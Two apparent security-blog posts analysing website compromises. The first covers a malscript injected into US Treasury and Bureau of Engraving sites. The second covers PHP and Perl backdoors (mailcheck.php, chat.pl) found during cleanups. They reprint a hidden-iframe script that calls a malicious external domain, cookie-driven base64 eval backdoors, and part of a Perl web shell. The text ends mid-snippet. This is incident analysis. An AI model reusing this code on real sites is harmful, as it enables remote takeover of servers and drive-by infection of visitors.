It was announced by AVG that the websites: bep.gov (Bureau of Engraving and Printing), bep.treas.gov and moneyfactory.gov were injected with a malscript:

<SCR IPT (space added)>            function addCookie(name, value, hours)            {                  var date = new Date();                 date.setTime(date.getTime()+(hours*3600000));                 var expires ”; expires=”+date.toGMTString();                document.cookie = name+”=”+value+expires+”; “;           }

document.write(‘<iframe frameborder=”0″ onload=\’ if (!this.src){ this.src=”http://grepad.com/in.cgi?3″; this.height=0; this.width=0;} \’></iframe>’); addCookie(“cook”, “1″, 24); </SCR IPT (space added)>

According to this webpage: http://news.softpedia.com/news/Department-of-the-Treasury-Website-Rigged-to-Exploit-Visitors-141277.shtml ”Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious grepad.com domain in both attacks.”

However, it could also be that someone with FTP access to the website had a virus. The virus steals FTP login credentials and sends them to a server which then infects the websites it has legitimate access to. I see no mention of that possibility. Being that this code was injected after the closing html tag, I doubt very seriously that it’s a SQL injection, possible, but highly unlikely.

Could it have been part of the larger compromise at the hosting provider? Possibly, although last I heard and read, they had cleaned that all up and I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.

 It could have been that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the “stuff” hits the fan. I have applauded them before and I do so now as well.

 Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?

Please leave your comments below…

Thank you.

This attack isn’t anything new, it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently so I thought I’d elaborate.

Quite often when scanning or cleaning infected websites, when we see the mailcheck.php file, we also see the chat.pl file but that isn’t cast in stone. However, we have not seen chat.pl by itself. In other words, mailcheck.php can appear by itself, but chat.pl does not – at least from what we’ve seen.

The mailcheck.php files usually contains this code:

Which deobfuscates to:

if(isset($COOKIE[“PHPSESSIID”])){eval(base64_decode($COOKIE[“PHPSESSIID”]));exit;}

The chat.pl file is programmed in Perl and looks like:

#!/usr/bin/perl use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ=="); $P = "Lf'njItkk"; $WinNT = 0; $NTCmdSep = "&"; $UnixCmdSep = ";"; $CommandTimeoutDuration = 120; $ShowDynamicOutput = 1;

As you can see, this code also uses the base64 decoding even though in it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or chat.pl, we’ve seen a number of .php and sometimes even .html files that have some PHP code inserted across the top of the file that looks like:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.’<script language=”javascript”>function t()…